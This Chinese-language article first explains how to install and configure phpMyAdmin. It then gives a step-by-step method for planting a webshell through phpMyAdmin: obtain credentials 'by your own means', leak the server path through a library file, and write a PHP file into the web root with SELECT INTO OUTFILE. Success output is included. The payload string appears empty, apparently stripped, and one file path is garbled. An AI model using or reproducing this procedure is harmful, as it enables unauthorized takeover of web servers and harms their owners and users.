phpmyadmin 配置 ​phpmyadmin怎么得到webshell？

phpmyadmin 配置安装：

1.网上下载PHPMyAdmin，我们将其释放到htdocs目录中，例如htdocs\phpmyadmin。

2.打开phpmyadmin目录，在此目录下是否有config.sample.inc.php文件，如果存在，那么将其改名为config.inc.php。（根据版本不同，有可能直接就有config.inc.php文件，那就无需改名，也有可能根本就没有config.sample.inc.php或者config.inc.php，那我们就到phpmyadmin\libraries目录下将config.default.php复制到phpmyadmin目录下并改名为config.inc.php）。

3.打开config.inc.php文件(可以用写字板)，找到$cfg['blowfish_secret']='';与$cfg['Servers'][$i]['auth_type']='cookie';，如果$cfg['Servers'][$i]['auth_type']的值就像前面看到的那样为cookie的话，那么我们必须在$cfg['blowfish_secret']=''的引号中任意写入一串字符，大家可以把它理解为一个身份验证码。比如$cfg['blowfish_secret']='sunec'。存盘退出。

至此，phpmyadmin的安装配置工作就结束了，进入浏览器，在地址栏输入http://localhost/phpmyadmin/main.php，(这里的路径是根据先前你将phpmyadmin解压在htdocs的目录名决定的)，顺利的话，页面上应该出现让你输入用户名密码的画面了，输入用户名密码（Mysql的用户名密码），随即进入phpmyadmin的主界面。至于使用方法~暂时不在这里展开，大家可以自己先摸索一下~

 phpmyadmin怎么得到webshell？

1.如何拿到登陆密码，自己想办法。

2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

3.选择一个Database.运行以下语句.

----start code---

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('');

select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';

Drop TABLE IF EXISTS a;

----end code---

4.如果没什么意外.对应网站得到webshell

您运行的 SQL 语句已经成功运行了。

SQL 查询:

CREATE TABLE a(

cmd text NOT NULL

);# MySQL 返回的查询结果为空(即零行)。

INSERT INTO a( cmd )

VALUES (

''

);# 影响列数： 1

SELECT cmd

FROM a

INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影响列数： 1

DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。